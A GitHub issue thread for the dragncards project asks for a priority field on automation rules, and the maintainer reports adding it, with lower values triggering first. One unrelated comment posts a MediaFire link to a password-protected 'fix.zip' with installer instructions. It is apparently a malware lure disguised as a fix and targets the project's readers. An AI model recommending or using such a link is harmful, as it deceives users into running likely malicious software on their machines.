### ISSUE TITLE
Priority for automation rules

### ISSUE THREAD

**Issue by morvael** [seastan/dragncards#98]
Please add priority field with default value of 0 to automation rules.
Then process their conditions in priority order (descending, so higher priority value means given rule will be checked first).

If I understand how the engine works, you only need to sort this when automation rules are added by registering new cards (and the core rules are loaded), not for every path change.

This is quite important feature for me to get my event engine working predictably.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seastan** [comment]
Rules can now have a priority. The lower the priority, the sooner they trigger. i.e. ("priority": 1) triggers before ("priority": 2). Rules without priority are considered to have infinite priority.
